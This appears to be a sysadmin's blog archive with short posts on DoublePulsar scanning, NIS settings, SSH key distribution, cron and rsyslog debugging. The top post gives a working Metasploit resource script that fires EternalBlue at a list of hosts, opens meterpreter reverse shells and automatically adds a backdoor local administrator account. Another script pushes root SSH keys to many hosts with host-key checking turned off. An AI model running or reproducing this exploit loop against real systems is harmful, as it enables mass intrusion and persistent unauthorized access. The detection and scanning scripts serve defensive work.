Thursday, August 16, 2018

remotely exploit a number of hosts with metasploit via eternalblue

in a previous post i have mentioned how to do a scan for doublepulsar infected hosts and how to feed these hosts to msf. that's fine. but, i guess mass-exploiting those hosts is of some utility, too.
 
   
 ## msfconsole
  
 msf > vulns -R  
 … a lot of text … look at end of output for a file dropped in /tmp e.g. ...  
 RHOSTS => file:/tmp/msf-db-rhosts-20180816-27096-ncow7k  
   
 msf > exit  
   
 # cd ~/.msf4/  
 # cp /tmp/msf-db-rhosts-20180816-27096-ncow7k thewicked  
 # msfconsole -r doublepulsar-loop.rc  
   
 Once all as completed, look through ~/.msf4/logs/doublepuslar.log for adminuser  
 as those hosts have had the local admin user for your evil created.  
   
## files
   
 [doublepulsar-loop.rc]  
   
 <ruby>  
   
 # the rhosts from vuln_db  
 hostsfile="/root/.msf4/thewicked"  
 hosts=[]  
 File.open(hostsfile,"r") do |f|  
 f.each_line do |line|  
 hosts.push line.strip  
 end  
 end  
   
 # msfconsole commands with chained post exploit  
 self.run_single("resource /root/.msf4/doublepulsar.rc")  
   
 # the rhosts loop  
 hosts.each do |rhost|  
 self.run_single("set rhost #{rhost}")  
 self.run_single("exploit")   
 run_single("sleep 2s")  
 end  
   
 </ruby>  
   
 [doublepulsar.rc]  
   
 spool /root/.msf4/logs/doublepulsar.log  
 set consolelogging true  
 set loglevel 5  
 set sessionlogging true  
 set timestampoutput true  
   
 use exploit/windows/smb/ms17_010_eternalblue  
 set VerifyArch False  
 set VerifyTarget False  
 set PAYLOAD windows/x64/meterpreter/reverse_tcp  
 set LHOST   
 set AUTORUNSCRIPT multiscript -rc /root/.msf4/doublepulsar-lsadmin  
   
 [doublepulsar-lsadmin]  
 execute -H -f cmd.exe -a "/c net user adminuser badpassword /add"  
 execute -H -f cmd.exe -a "/c net localgroup administrators /add adminuser"  
 execute -H -f cmd.exe -a "/c bitsadmin task to download a scheduled task to patch and reboot"
 exit  
   
   

Monday, August 13, 2018

one-off doublepulsar scan script because sometimes people need to do one thing and one thing only

so yeah.
 #!/bin/bash  
 EXECUTE=$(date "+%Y%m%d")  
   
 read -p "Enter IP to evaluate: " IP  
 if [[ $IP =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then  
     read -p "Enter email address (or not): " EMAIL  
 else echo "Not a valid IP" && exit 0  
 fi  
   
 rm -rf /tmp/$IP
 mkdir /tmp/$IP  
 cd /tmp/$IP  
   
 #msfconsole  
 sudo msfconsole -x "color false ; banner false ; spool /tmp/$IP/output.msf ; use auxiliary/scanner/smb/smb_ms17_010; set RHOSTS $IP ; run; exit"  
 sed 's/]\ /\\\n/g' /tmp/$IP/output.msf | sed -r '/Error|NOT|properly|Script|\[|\]/d' | sed 's/:445//g' | sed '/-/!d' |sort -u > /tmp/$IP/output.msf.1  
 sed '/VULNERABLE/!d' /tmp/$IP/output.msf.1 > /tmp/$IP/output.msf.VULN  
 sed '/INFECTED/!d' /tmp/$IP/output.msf.1 > /tmp/$IP/output.msf.INFECTED  
 clear  
   
 if [ -s /tmp/$IP/output.msf.INFECTED ]  
 then  
     echo " Uh oh $IP DoublePulsar infected"  
     mail -s " $IP DoublePulsar infected " $EMAIL < /tmp/$IP/output.msf.INFECTED  
     mail -s " $IP DoublePulsar intected $EXECUTE " youreffingsysadmin@hell.com < /tmp/$IP/output.msf.1  
 else  
     echo " Phew $IP not infected "  
 fi  
   
 if [ -s /tmp/$IP/output.msf.VULN ]  
 then  
     echo " Sigh $IP DoublePulsar vulnerable "  
     mail -s " $IP DoublePulsar vulnerable " $EMAIL < /tmp/$IP/output.msf.1  
 else  
     echo " Double Phew $IP not DoublePulsar vulnerable"  
 fi  
   
 cd /tmp  
 rm -rf /tmp/$IP  
   
 exit 0  
   

Friday, July 20, 2018

cron job for doublepulsar detection, burning, metasploit scan, and email of results

double pulsar is a major drag. it is a nasty worm that hangs out and acts as a backdoor on a system. it is propagated by smbv1 trans2 calls. fun stuff. i needed to figure out how to automate discovery, burning, and identification of vulnerable systems. oh, and email me the results.

here's what i came up with:
$ dpkg-reconfigure exim4-config
$ apt-get install msf
$ searchsploit -u
$ apt-get install masscan
$ git clone https://github.com/countercept/doublepulsar-detection-script.git
$ mkdir -p /root/scripts
$ mkdir -p /root/to.process
$ touch /root/to.process ; echo "." >> /tmp/to.process/empty

-- script doublepulsar.cron in /root/scripts --

#!/bin/bash
NETWORKRANGE=6.6.6.0/24
PROCESS=/root/to.process
EXECUTE=$(date "+%Y%m%d")
NAME=HELL

cd $PROCESS

#masscan
masscan -p445 $NETWORKRANGE > $PROCESS/output.masscan
sed -i "s/^.* on //" $PROCESS/output.masscan

#detect
/root/doublepulsar-detection-script/detect_doublepulsar_smb.py --file \
$PROCESS/output.masscan --uninstall --threads 100 --timeout 2 > \
$PROCESS/output.detect
sed '/DETECTED/!d' $PROCESS/output.detect > $PROCESS/output.detect.INFECTED

#msfconsole
msfconsole -x "color false ; spool $PROCESS/output.msf ; \
use auxiliary/scanner/smb/smb_ms17_010; set RHOSTS file:$PROCESS/output.masscan ; set thread 100; run; exit"
sed 's/]\ /\\\n/g' $PROCESS/output.msf | sed -r '/Error|NOT|properly|Script|\[|\]/d' | sed 's/:445//g' | sed '/-/!d' |sort -u > $PROCESS/output.msf.1
sed '/VULNERABLE/!d' $PROCESS/output.msf.1 > $PROCESS/output.msf.VULN
sed '/INFECTED/!d' $PROCESS/output.msf.1 > $PROCESS/output.msf.INFECTED

#mail
if [ -s $PROCESS/output.detect.INFECTED ]
then
        mail -s "DoublePulsar Detect Infected Hosts $NETWORKRANGE" me@here < $PROCESS/output.detect.INFECTED
else
        mail -s "No DoublePulsar Detect Infected Hosts $NETWORKRANGE" me@here < $PROCESS/empty
fi

if [ -s $PROCESS/output.msf.INFECTED ]
then
        cat $PROCESS/output.msf.INFECTED $PROCESS/output.msf.VULN >> $PROCESS/output.msf.INFECTEDVULN
        mail -s "DoublePulsar MetaSploit Infected and Vulnerable Hosts $NETWORKRANGE" me@here < $PROCESS/output.msf.INFECTEDVULN
else
        mail -s "No DoublePulsar MetaSploit Vulnerable Hosts $NETWORKRANGE" me@here < $PROCESS/empty
fi

#cleanup
mkdir -p $PROCESS/$NAME/$EXECUTE
mv output.* $PROCESS/$NAME/$EXECUTE

exit

-- end script --
run it every night, every hour, whenever. put it in /etc/crontab:
# evil
30 12   * * *   root    /root/scripts/doublepulsar.cron
the joy of the script is that with all the text processing, is it can be piped to syslog. so yeah, old news for you...

Thursday, March 22, 2018

nis master server settings on cloned system

 i need to change nis master server settings on cloned system. don't even ask.  
   
 commands:  
 # domainname <newdomainname>  
 # mv /var/yp/<domainname> to <newdomainname>  
   
 edit:  
 /etc/hosts change <hostname> to <newhostname> ; <ip> to <newip>  
 /etc/conf.d/net change <domainname> to <newdomainname>  
 /etc/yp.conf change <domainname> to <newdomainname>  
 /etc/ypserv.conf   
 /etc/ypserv.securenets  
 /var/yp/ypservers change <hostname> to <newhostname>  
   
 make -C /var/yp  
   
 test:  
 # ypwhich  
 Should return <newhostname>  
   
 # ypcat passwd | grep <username>  
 # ypcat group | grep <groupname>  
 Both should return known results  

Wednesday, March 7, 2018

put pubkeys on a lot of hosts

 i need to zap authorized_keys *all over the place*  
 this concatenates a file which contains sever id_rsa.pub keys.  
   
 nodes is a long list of ip addresses.  
   
 #!/bin/bash  
   
 for i in `cat nodes` ; do  
    cat authorized_keys.add | ssh -o ConnectTimeout=5 -o StrictHostKeyChecking=no -o \  
    UserKnownHostsFile=/dev/null -t -t -t -l root $i 'cat >> /root/.ssh/authorized_keys'  
 done  

Thursday, February 8, 2018

when crond is using /bin/sh

 crond uses sh by default. that last cron script i posted, well tee is broke in sh. do this:

0 12 * * * root script.sh 2>&1 | bash -c 'tee >(/usr/bin/logger -p local6.notice -t script_tag ) >(mail -s "script output" me@here) >/dev/null'   

Monday, February 5, 2018

debug rsyslogd

 why isn't rsyslogd sending anything out?  
   
 window 1 $ tcpdump -u dst port 514  
 window 2 $ logger -n 6.6.6.6 -P 514 "hello god"  
   
 <no answer>  
   
 hmm. let's debug rsyslogd  
   
 $ export RSYSLOG_DEBUGLOG="/tmp/debuglog"  
 $ export RSYSLOG_DEBUG="Debug"  
 $ service rsyslog stop  
 $ rsyslogd -d | head -10   
   
 7160.005597645:7fae096a3780: rsyslogd 7.2.6 startup, module path '', cwd:/root  
 7160.005872662:7fae096a3780: caller requested object 'net', not found (iRet -3003)  
 7160.005895004:7fae096a3780: Requested to load module 'lmnet'  
 7160.005906331:7fae096a3780: loading module '/lib64/rsyslog/lmnet.so'  
 7160.006023505:7fae096a3780: module lmnet of type 2 being loaded (keepType=0).  
 7160.006030872:7fae096a3780: entry point 'isCompatibleWithFeature' not present in module  
 7160.006033780:7fae096a3780: entry point 'setModCnf' not present in module  
 7160.006036209:7fae096a3780: entry point 'getModCnfName' not present in module  
 7160.006038359:7fae096a3780: entry point 'beginCnfLoad' not present in module  
   
 bad modules.  
   
 recompile.